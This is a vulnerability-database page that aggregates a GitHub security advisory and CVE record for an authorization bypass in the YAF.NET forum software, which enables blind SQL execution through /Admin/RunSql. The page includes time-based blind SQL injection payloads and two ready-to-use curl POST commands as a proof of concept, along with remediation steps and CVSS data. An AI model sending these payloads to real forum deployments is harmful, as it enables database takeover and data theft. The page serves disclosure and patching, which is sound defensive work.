Vulnerability-Lookup

GHSA-XHW7-J96H-C3G5

Vulnerability from github – Published: 2026-05-05 20:32 – Updated: 2026-05-13 16:24

Summary

YAFNET: Pre-Handler Authorization Bypass on Admin Pages Enables Blind SQL Execution via `/Admin/RunSql`

Details

Issue Details: YAFNET's only admin authorization gate is PageSecurityCheckAttribute, implemented as a ResultFilterAttribute that runs after the page handler completes rather than before it. No other gate exists. Any admin OnPost… handler therefore executes its side effects before the filter rewrites the response to a 302 to /Info/4. The most impactful abuse is /Admin/RunSql, whose OnPostRunQuery binds Editor from the POST body and passes it straight to IDbAccess.RunSql with no caller check, yielding arbitrary SQL execution for any low-privileged user.

A deterministic boolean-conditional time oracle was confirmed end-to-end by extracting the first character of @@VERSION: IF (ASCII(SUBSTRING(@@VERSION, 1, 1)) = 77) WAITFOR DELAY '0:0:5' produced a ~5-second delay (confirming the byte is M), while IF (ASCII(SUBSTRING(@@VERSION, 1, 1)) = 76) WAITFOR DELAY '0:0:5' returned immediately.

Impact: An attacker holding the lowest-privileged authenticated role, effectively an anonymous attacker on any deployment that permits self-registration, gains arbitrary blind SQL execution against the application's database, with full INSERT/UPDATE/DELETE access to every table including the Identity store (AspNetUsers, yaf_User, yaf_UserRole). This yields full loss of Confidentiality (any column extractable via the time oracle), full loss of Integrity (blind writes to identity, posts, and forum configuration, including self-promotion to HostAdmin), and full loss of Availability (DELETE/DROP/WAITFOR-driven DoS). The impact escalates out of the application's trust domain: if the underlying SQL Server instance has xp_cmdshell or CLR integration enabled (common in development and test builds), the same primitive yields OS-level command execution on the database host. Because the bypass is class-wide, every other admin handler is also callable, multiplying the blast radius across user management, XML imports, and file-writing configuration pages.

Likelihood: Exploitation requires only a registered forum account (self-registration available on most deployments) and a single HTTP POST request. The attack is fully automatable in one request per probe and produces a deterministic time-based oracle with no error handling required, making the overall likelihood very high.

Steps to Reproduce: - Register or log in to the forum as any low-privileged user. - Acquire the standard __RequestVerificationToken token from any rendered page and the cookies. - Use the following CURL command: Payload: IF (ASCII(SUBSTRING(@@VERSION, 1, 1)) = 77) WAITFOR DELAY '0:0:5' (77 is the character M) URL Encoded Payload: %49%46%20%28%41%53%43%49%49%28%53%55%42%53%54%52%49%4e%47%28%40%40%56%45%52%53%49%4f%4e%2c%20%31%2c%20%31%29%29%20%3d%20%37%37%29%20%57%41%49%54%46%4f%52%20%44%45%4c%41%59%20%27%30%3a%30%3a%35%27

curl.exe --path-as-is -i -s -k -X POST `
  -H 'Host: yetanotherforum.internal:8080' `
  -H 'User-Agent: curl/8.18.0' `
  -H 'Accept: */*' `
  -H 'Content-Type: application/x-www-form-urlencoded' `
  -H 'Content-Length: 428' `
  -H 'Connection: keep-alive' `
  -b '<Replace with Cookies>' `
  --data-binary 'Editor=%49%46%20%28%41%53%43%49%49%28%53%55%42%53%54%52%49%4e%47%28%40%40%56%45%52%53%49%4f%4e%2c%20%31%2c%20%31%29%29%20%3d%20%37%37%29%20%57%41%49%54%46%4f%52%20%44%45%4c%41%59%20%27%30%3a%30%3a%35%27&__RequestVerificationToken=<Replace with Token>' `
  -w '\n----\nDNS:        %{time_namelookup}s\nConnect:    %{time_connect}s\nTTFB:       %{time_starttransfer}s\nTotal time: %{time_total}s\nHTTP code:  %{http_code}\n' `
  'http://yetanotherforum.internal:8080/Admin/RunSql?handler=RunQuery'

Payload: IF (ASCII(SUBSTRING(@@VERSION, 1, 1)) = 76) WAITFOR DELAY '0:0:5' (76 is the character L) URL Encoded Payload: %49%46%20%28%41%53%43%49%49%28%53%55%42%53%54%52%49%4e%47%28%40%40%56%45%52%53%49%4f%4e%2c%20%31%2c%20%31%29%29%20%3d%20%37%36%29%20%57%41%49%54%46%4f%52%20%44%45%4c%41%59%20%27%30%3a%30%3a%35%27

curl.exe --path-as-is -i -s -k -X POST `
  -H 'Host: yetanotherforum.internal:8080' `
  -H 'User-Agent: curl/8.18.0' `
  -H 'Accept: */*' `
  -H 'Content-Type: application/x-www-form-urlencoded' `
  -H 'Content-Length: 428' `
  -H 'Connection: keep-alive' `
  -b '<Replace with Cookies>' `
  --data-binary 'Editor=%49%46%20%28%41%53%43%49%49%28%53%55%42%53%54%52%49%4e%47%28%40%40%56%45%52%53%49%4f%4e%2c%20%31%2c%20%31%29%29%20%3d%20%37%36%29%20%57%41%49%54%46%4f%52%20%44%45%4c%41%59%20%27%30%3a%30%3a%35%27&__RequestVerificationToken=<Replace with Token>' `
  -w '\n----\nDNS:        %{time_namelookup}s\nConnect:    %{time_connect}s\nTTFB:       %{time_starttransfer}s\nTotal time: %{time_total}s\nHTTP code:  %{http_code}\n' `
  'http://yetanotherforum.internal:8080/Admin/RunSql?handler=RunQuery'

Observe that when the condition is true the response time increases, if false, it remains unchanged which confirms the presence of SQL Injection.

Remediation: - Convert PageSecurityCheckAttribute from a ResultFilterAttribute to an IAsyncPageFilter so the admin check runs in OnPageHandlerExecutionAsync and short-circuits with AccessDenied() before any handler side effects occur. - Layer an ASP.NET Core authorization policy as defense-in-depth: AddAuthorization(... AddPolicy("YafAdmin", ...)) combined with AuthorizeFolder("/Admin", "YafAdmin") in the Razor Pages conventions. - Restrict /Admin/RunSql to HostAdmin only and wrap IDbAccess.RunSql in a statement-type allow-list that rejects non-read-only SQL, even for legitimate admins. - Audit and fix any other authorization logic implemented in ResultFilterAttribute / OnResultExecuting(Async), they share the same lifecycle bug. - Add regression tests that invoke each admin OnPost… handler as a non-admin and assert no database or filesystem side effects occur.

Severity ?

8.8 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.0.4"
      },
      "package": {
        "ecosystem": "NuGet",
        "name": "YAFNET.Core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.0.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-43937"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-841",
      "CWE-89"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-05T20:32:27Z",
    "nvd_published_at": "2026-05-12T15:16:15Z",
    "severity": "HIGH"
  },
  "details": "**Issue Details:**\nYAFNET\u0027s only admin authorization gate is `PageSecurityCheckAttribute`, implemented as a `ResultFilterAttribute` that runs *after* the page handler completes rather than before it. No other gate exists. Any admin `OnPost\u2026` handler therefore executes its side effects before the filter rewrites the response to a `302` to `/Info/4`. The most impactful abuse is `/Admin/RunSql`, whose `OnPostRunQuery` binds `Editor` from the POST body and passes it straight to `IDbAccess.RunSql` with no caller check, yielding arbitrary SQL execution for any low-privileged user.\n\nA deterministic boolean-conditional time oracle was confirmed end-to-end by extracting the first character of `@@VERSION`: `IF (ASCII(SUBSTRING(@@VERSION, 1, 1)) = 77) WAITFOR DELAY \u00270:0:5\u0027` produced a ~5-second delay (confirming the byte is `M`), while `IF (ASCII(SUBSTRING(@@VERSION, 1, 1)) = 76) WAITFOR DELAY \u00270:0:5\u0027` returned immediately.\n\n\n**Impact:**\nAn attacker holding the lowest-privileged authenticated role, effectively an anonymous attacker on any deployment that permits self-registration, gains arbitrary blind SQL execution against the application\u0027s database, with full `INSERT`/`UPDATE`/`DELETE` access to every table including the Identity store (`AspNetUsers`, `yaf_User`, `yaf_UserRole`). This yields full loss of Confidentiality (any column extractable via the time oracle), full loss of Integrity (blind writes to identity, posts, and forum configuration, including self-promotion to HostAdmin), and full loss of Availability (`DELETE`/`DROP`/`WAITFOR`-driven DoS). The impact escalates out of the application\u0027s trust domain: if the underlying SQL Server instance has `xp_cmdshell` or CLR integration enabled (common in development and test builds), the same primitive yields OS-level command execution on the database host. Because the bypass is class-wide, every other admin handler is also callable, multiplying the blast radius across user management, XML imports, and file-writing configuration pages.\n\n**Likelihood:**\nExploitation requires only a registered forum account (self-registration available on most deployments) and a single HTTP POST request. The attack is fully automatable in one request per probe and produces a deterministic time-based oracle with no error handling required, making the overall likelihood very high.\n\n**Steps to Reproduce:**\n- Register or log in to the forum as any low-privileged user.\n- Acquire the standard `__RequestVerificationToken` token from any rendered page and the cookies. \n- Use the following CURL command:\nPayload: ```IF (ASCII(SUBSTRING(@@VERSION, 1, 1)) = 77) WAITFOR DELAY \u00270:0:5\u0027``` (77 is the character **M**)\nURL Encoded Payload: ```%49%46%20%28%41%53%43%49%49%28%53%55%42%53%54%52%49%4e%47%28%40%40%56%45%52%53%49%4f%4e%2c%20%31%2c%20%31%29%29%20%3d%20%37%37%29%20%57%41%49%54%46%4f%52%20%44%45%4c%41%59%20%27%30%3a%30%3a%35%27```\n\n```\ncurl.exe --path-as-is -i -s -k -X POST `\n  -H \u0027Host: yetanotherforum.internal:8080\u0027 `\n  -H \u0027User-Agent: curl/8.18.0\u0027 `\n  -H \u0027Accept: */*\u0027 `\n  -H \u0027Content-Type: application/x-www-form-urlencoded\u0027 `\n  -H \u0027Content-Length: 428\u0027 `\n  -H \u0027Connection: keep-alive\u0027 `\n  -b \u0027\u003cReplace with Cookies\u003e\u0027 `\n  --data-binary \u0027Editor=%49%46%20%28%41%53%43%49%49%28%53%55%42%53%54%52%49%4e%47%28%40%40%56%45%52%53%49%4f%4e%2c%20%31%2c%20%31%29%29%20%3d%20%37%37%29%20%57%41%49%54%46%4f%52%20%44%45%4c%41%59%20%27%30%3a%30%3a%35%27\u0026__RequestVerificationToken=\u003cReplace with Token\u003e\u0027 `\n  -w \u0027\\n----\\nDNS:        %{time_namelookup}s\\nConnect:    %{time_connect}s\\nTTFB:       %{time_starttransfer}s\\nTotal time: %{time_total}s\\nHTTP code:  %{http_code}\\n\u0027 `\n  \u0027http://yetanotherforum.internal:8080/Admin/RunSql?handler=RunQuery\u0027\n```\n\u003cimg width=\"1619\" height=\"921\" alt=\"image\" src=\"https://github.com/user-attachments/assets/1c5d4d96-a69a-47eb-9558-e5fe1e6cc9e4\" /\u003e\n\nPayload: ```IF (ASCII(SUBSTRING(@@VERSION, 1, 1)) = 76) WAITFOR DELAY \u00270:0:5\u0027``` (76 is the character **L**)\nURL Encoded Payload: ```%49%46%20%28%41%53%43%49%49%28%53%55%42%53%54%52%49%4e%47%28%40%40%56%45%52%53%49%4f%4e%2c%20%31%2c%20%31%29%29%20%3d%20%37%36%29%20%57%41%49%54%46%4f%52%20%44%45%4c%41%59%20%27%30%3a%30%3a%35%27```\n\n```\ncurl.exe --path-as-is -i -s -k -X POST `\n  -H \u0027Host: yetanotherforum.internal:8080\u0027 `\n  -H \u0027User-Agent: curl/8.18.0\u0027 `\n  -H \u0027Accept: */*\u0027 `\n  -H \u0027Content-Type: application/x-www-form-urlencoded\u0027 `\n  -H \u0027Content-Length: 428\u0027 `\n  -H \u0027Connection: keep-alive\u0027 `\n  -b \u0027\u003cReplace with Cookies\u003e\u0027 `\n  --data-binary \u0027Editor=%49%46%20%28%41%53%43%49%49%28%53%55%42%53%54%52%49%4e%47%28%40%40%56%45%52%53%49%4f%4e%2c%20%31%2c%20%31%29%29%20%3d%20%37%36%29%20%57%41%49%54%46%4f%52%20%44%45%4c%41%59%20%27%30%3a%30%3a%35%27\u0026__RequestVerificationToken=\u003cReplace with Token\u003e\u0027 `\n  -w \u0027\\n----\\nDNS:        %{time_namelookup}s\\nConnect:    %{time_connect}s\\nTTFB:       %{time_starttransfer}s\\nTotal time: %{time_total}s\\nHTTP code:  %{http_code}\\n\u0027 `\n  \u0027http://yetanotherforum.internal:8080/Admin/RunSql?handler=RunQuery\u0027\n```\n\n\u003cimg width=\"1616\" height=\"928\" alt=\"image\" src=\"https://github.com/user-attachments/assets/e499da2e-d4d1-41cd-a5da-e709bf60f817\" /\u003e\n\nObserve that when the condition is true the response time increases, if false, it remains unchanged which confirms the presence of SQL Injection.\n\n**Remediation:**\n- Convert `PageSecurityCheckAttribute` from a `ResultFilterAttribute` to an `IAsyncPageFilter` so the admin check runs in `OnPageHandlerExecutionAsync` and short-circuits with `AccessDenied()` before any handler side effects occur.\n- Layer an ASP.NET Core authorization policy as defense-in-depth: `AddAuthorization(... AddPolicy(\"YafAdmin\", ...))` combined with `AuthorizeFolder(\"/Admin\", \"YafAdmin\")` in the Razor Pages conventions.\n- Restrict `/Admin/RunSql` to `HostAdmin` only and wrap `IDbAccess.RunSql` in a statement-type allow-list that rejects non-read-only SQL, even for legitimate admins.\n- Audit and fix any other authorization logic implemented in `ResultFilterAttribute` / `OnResultExecuting(Async)`, they share the same lifecycle bug.\n- Add regression tests that invoke each admin `OnPost\u2026` handler as a non-admin and assert no database or filesystem side effects occur.",
  "id": "GHSA-xhw7-j96h-c3g5",
  "modified": "2026-05-13T16:24:24Z",
  "published": "2026-05-05T20:32:27Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/YAFNET/YAFNET/security/advisories/GHSA-xhw7-j96h-c3g5"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43937"
    },
    {
      "type": "WEB",
      "url": "https://github.com/YAFNET/YAFNET/commit/27f7e671f93698f7e014d5d0fb88320248b8aa20"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/YAFNET/YAFNET"
    },
    {
      "type": "WEB",
      "url": "https://github.com/YAFNET/YAFNET/releases/tag/v4.0.5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "YAFNET: Pre-Handler Authorization Bypass on Admin Pages Enables Blind SQL Execution via `/Admin/RunSql`"
}

CVE-2026-43937 (GCVE-0-2026-43937)

Vulnerability from cvelistv5 – Published: 2026-05-12 14:00 – Updated: 2026-05-12 15:42

Title

YAF.NET: Pre-Handler Authorization Bypass on Admin Pages Enabling Blind SQL Execution via `/Admin/RunSql`

Summary

YetAnotherForum.NET (YAF.NET) is a C# ASP.NET forum. Prior to 4.0.5, Any admin OnPost… handler executes its side effects before the ResultFilterAttribute rewrites the response to a 302 to /Info/4. The most impactful abuse is /Admin/RunSql, whose OnPostRunQuery binds Editor from the POST body and passes it straight to IDbAccess.RunSql with no caller check, yielding arbitrary SQL execution for any low-privileged user. This vulnerability is fixed in 4.0.5.

Severity ?

8.8 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
CWE-841 - Improper Enforcement of Behavioral Workflow

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/YAFNET/YAFNET/security/advisor…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
YAFNET	YAFNET	Affected: < 4.0.5

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-43937",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-12T15:42:40.301152Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-12T15:42:43.601Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/YAFNET/YAFNET/security/advisories/GHSA-xhw7-j96h-c3g5"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "YAFNET",
          "vendor": "YAFNET",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 4.0.5"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "YetAnotherForum.NET (YAF.NET) is a C# ASP.NET forum. Prior to 4.0.5, Any admin OnPost\u2026 handler executes its side effects before the ResultFilterAttribute rewrites the response to a 302 to /Info/4. The most impactful abuse is /Admin/RunSql, whose OnPostRunQuery binds Editor from the POST body and passes it straight to IDbAccess.RunSql with no caller check, yielding arbitrary SQL execution for any low-privileged user. This vulnerability is fixed in 4.0.5."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-89",
              "description": "CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-841",
              "description": "CWE-841: Improper Enforcement of Behavioral Workflow",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-12T14:00:35.599Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/YAFNET/YAFNET/security/advisories/GHSA-xhw7-j96h-c3g5",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/YAFNET/YAFNET/security/advisories/GHSA-xhw7-j96h-c3g5"
        }
      ],
      "source": {
        "advisory": "GHSA-xhw7-j96h-c3g5",
        "discovery": "UNKNOWN"
      },
      "title": "YAF.NET: Pre-Handler Authorization Bypass on Admin Pages Enabling Blind SQL Execution via `/Admin/RunSql`"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-43937",
    "datePublished": "2026-05-12T14:00:35.599Z",
    "dateReserved": "2026-05-04T16:59:09.089Z",
    "dateUpdated": "2026-05-12T15:42:43.601Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

GHSA-XHW7-J96H-C3G5

CVE-2026-43937 (GCVE-0-2026-43937)

Tags

Sightings

Nomenclature